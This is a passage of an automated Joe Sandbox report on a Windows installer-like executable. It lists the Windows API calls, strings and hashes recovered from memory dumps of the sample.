                                                                                                            • API String ID: 3478007392-2498399450
                                                                                                            • Opcode ID: 66ed2d7305b3b0eec70b6170d071817c925b739ceb1fb38ca2eb5854fddf3c51
                                                                                                            • Instruction ID: 89e1f457e47db82f9faa956fb130fb356174019ed1a27fb48ec6c883adef8708
                                                                                                            • Opcode Fuzzy Hash: 66ed2d7305b3b0eec70b6170d071817c925b739ceb1fb38ca2eb5854fddf3c51
                                                                                                            • Instruction Fuzzy Hash: E4E08CA1340310EADA107BA26D8AF1A2654A320715F8C443BF080620E1C7BC0C60C95F
                                                                                                            APIs
                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00476644
                                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,0047673B,0049B050,00000000), ref: 00476657
                                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0047665D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                                            • String ID: AllowSetForegroundWindow$user32.dll
                                                                                                            • API String ID: 1782028327-3855017861
                                                                                                            • Opcode ID: 23d9d9cc46354639512b471ab02422c9b54f1bfd7ccda73b957914f4bb9bf9af
                                                                                                            • Instruction ID: 0cf89beef61ef8a76223fb5aa8394d6e95b25c45a6fd57a36df02fca6db0c00c
                                                                                                            • Opcode Fuzzy Hash: 23d9d9cc46354639512b471ab02422c9b54f1bfd7ccda73b957914f4bb9bf9af
                                                                                                            • Instruction Fuzzy Hash: 79D0A9E0200F0169DD10B3F2AD47EAB329ECE84B10B92843B7408E3182CA3DE8404E3C
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004970B6), ref: 0044EFD3
                                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: NotifyWinEvent$dD$user32.dll
                                                                                                            • API String ID: 1646373207-754903266
                                                                                                            • Opcode ID: dc61cc67552be4efe4d14fef26ae15ab6e12dbd37892583342a89fc102010d4c
                                                                                                            • Instruction ID: d2dc615c88fd328006faf79361cd74abdd3d8da8a377be2bcafca06377aa3dce
                                                                                                            • Opcode Fuzzy Hash: dc61cc67552be4efe4d14fef26ae15ab6e12dbd37892583342a89fc102010d4c
                                                                                                            • Instruction Fuzzy Hash: 37E012F0E41340AEFB00BFFB984271A3AA0B76431CB00007FB40066292CB7C48284A5F
                                                                                                            APIs
                                                                                                            • BeginPaint.USER32(00000000,?), ref: 00416C62
                                                                                                            • SaveDC.GDI32(?), ref: 00416C93
                                                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D55), ref: 00416CF4
                                                                                                            • RestoreDC.GDI32(?,?), ref: 00416D1B
                                                                                                            • EndPaint.USER32(00000000,?,00416D5C,00000000,00416D55), ref: 00416D4F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                                            • String ID:
                                                                                                            • API String ID: 3808407030-0
                                                                                                            • Opcode ID: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                                                                            • Instruction ID: c70ebf24aed337d2f43398dc79d2f74fb7d9fd2825851e0a0ce007a429ecfdc3
                                                                                                            • Opcode Fuzzy Hash: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                                                                            • Instruction Fuzzy Hash: D7413C70A04204AFDB04DB99D985FAE77F9EB48304F1640AEE4059B362D778ED85CB58
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                                                            • Instruction ID: fc599d946787c0506e623d191f8eefd10b4a308858d20a9272ac2d3790a9447e
                                                                                                            • Opcode Fuzzy Hash: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                                                            • Instruction Fuzzy Hash: A1314F746047449FC320EF69C984BABB7E8AF89314F04891EF9D9C3752C638EC858B19
                                                                                                            APIs
                                                                                                            • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429818
                                                                                                            • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429847
                                                                                                            • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429863
                                                                                                            • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042988E
                                                                                                            • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 004298AC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: 5944dffaa8c0b8b44a765cdc0198bb50be024f609766e5ff2339194419bf2bce
                                                                                                            • Instruction ID: c447c4a9eb68fcc7219df142ffdb21218ba7f26748626b58278b549ffff81a32
                                                                                                            • Opcode Fuzzy Hash: 5944dffaa8c0b8b44a765cdc0198bb50be024f609766e5ff2339194419bf2bce
                                                                                                            • Instruction Fuzzy Hash: 3321AF707507057AE710BB66CC82F5B76ACEB42708F94043EB541AB2D2DF78ED41825C
                                                                                                            APIs
                                                                                                            • GetSystemMetrics.USER32(0000000B), ref: 0041BBDA
                                                                                                            • GetSystemMetrics.USER32(0000000C), ref: 0041BBE4
                                                                                                            • 73A1A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC22
                                                                                                            • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD8D,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC69
                                                                                                            • DeleteObject.GDI32(00000000), ref: 0041BCAA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MetricsSystem$A26310A570DeleteObject
                                                                                                            • String ID:
                                                                                                            • API String ID: 4277397052-0
                                                                                                            • Opcode ID: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                                                            • Instruction ID: d912de8c3c57523408de13a46bdb54385142bc6a2202aaac6113f7462e2bca5d
                                                                                                            • Opcode Fuzzy Hash: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                                                            • Instruction Fuzzy Hash: CE314F74E00209EFDB04DFA5C941AAEB7F5EB48700F11856AF514AB381D7789E40DB98
                                                                                                            APIs
                                                                                                              • Part of subcall function 0045C76C: SetLastError.KERNEL32(00000057,00000000,0045C838,?,?,?,?,00000000), ref: 0045C7D7
                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725E9
                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725FF
                                                                                                            Strings
                                                                                                            • Failed to set permissions on registry key (%d)., xrefs: 00472610
                                                                                                            • Setting permissions on registry key: %s\%s, xrefs: 004725AE
                                                                                                            • Could not set permissions on the registry key because it currently does not exist., xrefs: 004725F3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast
                                                                                                            • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                                            • API String ID: 1452528299-4018462623
                                                                                                            • Opcode ID: b6a47f64f510fce16551a7a9453ce12765f8589f174dbaf3fa05134ae08179ca
                                                                                                            • Instruction ID: 4334e49d385bf692f2cc32478bc4a2497c1f2fe716dd62bcd395c3eafaa3e5f2
                                                                                                            • Opcode Fuzzy Hash: b6a47f64f510fce16551a7a9453ce12765f8589f174dbaf3fa05134ae08179ca
                                                                                                            • Instruction Fuzzy Hash: 9C218370A046445FCB01DBAAD9827EEBBE4EB49314F50817BE408E7392D7B85D05CBA9
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$AllocString
                                                                                                            • String ID:
                                                                                                            • API String ID: 262959230-0
                                                                                                            • Opcode ID: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                                                            • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                                                            • Opcode Fuzzy Hash: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                                                            • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                                                            APIs
                                                                                                            • 73A18830.GDI32(00000000,00000000,00000000), ref: 00414429
                                                                                                            • 73A122A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414431
                                                                                                            • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414445
                                                                                                            • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041444B
                                                                                                            • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414456
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: A122A18830$A480
                                                                                                            • String ID:
                                                                                                            • API String ID: 3325508737-0
                                                                                                            • Opcode ID: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                                                                            • Instruction ID: 307ee49d89b37f6f535ee678b6e17b633f9af621dfcf88cb872c79a1e2d754b8
                                                                                                            • Opcode Fuzzy Hash: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                                                                            • Instruction Fuzzy Hash: A901D47121C3406AD200B63D8C45B9F6BEC8FC6314F05546EF494D7382C97ACC018765
                                                                                                            APIs
                                                                                                            • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 0040700B
                                                                                                            • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00407085
                                                                                                            • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070DD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Enum$NameOpenResourceUniversal
                                                                                                            • String ID: Z
                                                                                                            • API String ID: 3604996873-1505515367
                                                                                                            • Opcode ID: 9cf142189d4ecfc6757bb5486cc46db394a4e60b729a9f9f9915b5c39fe8e999
                                                                                                            • Instruction ID: 2d8f00a968b5306eb49df96258ffff6df6a72a1db963417fd4edcb7bb2ad48f8
                                                                                                            • Opcode Fuzzy Hash: 9cf142189d4ecfc6757bb5486cc46db394a4e60b729a9f9f9915b5c39fe8e999
                                                                                                            • Instruction Fuzzy Hash: C1513070E04208ABDB15DF55CD41A9EBBB9FB49304F1041BAE910BB3D1C778AE458F5A
                                                                                                            APIs
                                                                                                            • SetRectEmpty.USER32(?), ref: 0044C8A2
                                                                                                            • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044C8CD
                                                                                                            • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044C955
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DrawText$EmptyRect
                                                                                                            • String ID:
                                                                                                            • API String ID: 182455014-2867612384
                                                                                                            • Opcode ID: 6c05f6fd2de5f0114c24d089b6121ea037cee5e3f80eca8d109fa4c4a1bfdb21
                                                                                                            • Instruction ID: 68feaf95479c8b0f8d19ac4d8bed049c81d0e9902cdc902b6301711e3864cdc7
                                                                                                            • Opcode Fuzzy Hash: 6c05f6fd2de5f0114c24d089b6121ea037cee5e3f80eca8d109fa4c4a1bfdb21
                                                                                                            • Instruction Fuzzy Hash: 435152B0A01248AFDB50DFA5C885BDEBBF8FF49304F08447AE845EB251D7789944CB64
                                                                                                            APIs
                                                                                                            • 73A1A570.USER32(00000000,00000000,0042EF3C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EE12
                                                                                                              • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0042EE35
                                                                                                            • 73A1A480.USER32(00000000,?,0042EF21,00000000,0042EF1A,?,00000000,00000000,0042EF3C,?,?,?,?,00000000,00000000,00000000), ref: 0042EF14
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: A480A570CreateFontIndirectObjectSelect
                                                                                                            • String ID: ...\
                                                                                                            • API String ID: 2998766281-983595016
                                                                                                            • Opcode ID: e7ebfea45444ea9c11b2851c030b1c82e81be4d7c359b89fb9621dfee32d1b04
                                                                                                            • Instruction ID: f7e46b9156472dd3d3dfb1d2a9ceb23c9820bf6754630174aa29599cfb354949
                                                                                                            • Opcode Fuzzy Hash: e7ebfea45444ea9c11b2851c030b1c82e81be4d7c359b89fb9621dfee32d1b04
                                                                                                            • Instruction Fuzzy Hash: E0318170B00128ABDF11EF9AD841BAEB7B9EB48308F91447BF410A7291D7785D45CA69
                                                                                                            APIs
                                                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 00454848
                                                                                                            • GetLastError.KERNEL32(0000003C,00000000,00454891,?,?,?), ref: 00454859
                                                                                                              • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                                            • String ID: <$SuG
                                                                                                            • API String ID: 893404051-1504269210
                                                                                                            • Opcode ID: 0173540be8187d3cca920cd9054ca9af2117f56a2c32ed9380eed9ddca2bdfeb
                                                                                                            • Instruction ID: e58c708146c2f721f38e64faa2aac8e88425893723770a95bfdd45a03fe75b0c
                                                                                                            • Opcode Fuzzy Hash: 0173540be8187d3cca920cd9054ca9af2117f56a2c32ed9380eed9ddca2bdfeb
                                                                                                            • Instruction Fuzzy Hash: 7D218574A00249ABDB10EF65C88269E7BE8EF49349F50403AF844EB381D7789D498B98
                                                                                                            APIs
                                                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                                                            • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExitMessageProcess
                                                                                                            • String ID: Error$Runtime error at 00000000
                                                                                                            • API String ID: 1220098344-2970929446
                                                                                                            • Opcode ID: 65f8ed0532075a2792cd4408a2c9e4abcf3b0691aeac86d53ce49d1bb586f2e2
                                                                                                            • Instruction ID: 7c754c0b660761a5bc1c63aadfae0e1dd2c0c13e95eab211716155318e46cc07
                                                                                                            • Opcode Fuzzy Hash: 65f8ed0532075a2792cd4408a2c9e4abcf3b0691aeac86d53ce49d1bb586f2e2
                                                                                                            • Instruction Fuzzy Hash: E421CB606442514ADB11AB799C857163B9197E534CF04817BE700B73F2CA7D9C64C7EF
                                                                                                            APIs
                                                                                                              • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                                                              • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                              • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                            • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00455E48
                                                                                                            • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00455E75
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                                            • String ID: LoadTypeLib$RegisterTypeLib
                                                                                                            • API String ID: 1312246647-2435364021
                                                                                                            • Opcode ID: ff476844371f4104c378b253a494915691f6bbf47305687bf7563dfe30fd17cc
                                                                                                            • Instruction ID: e41936e4c8b07abfc49a8f10cd7ccd4a21eee7bf761b45698a75813e6285fe04
                                                                                                            • Opcode Fuzzy Hash: ff476844371f4104c378b253a494915691f6bbf47305687bf7563dfe30fd17cc
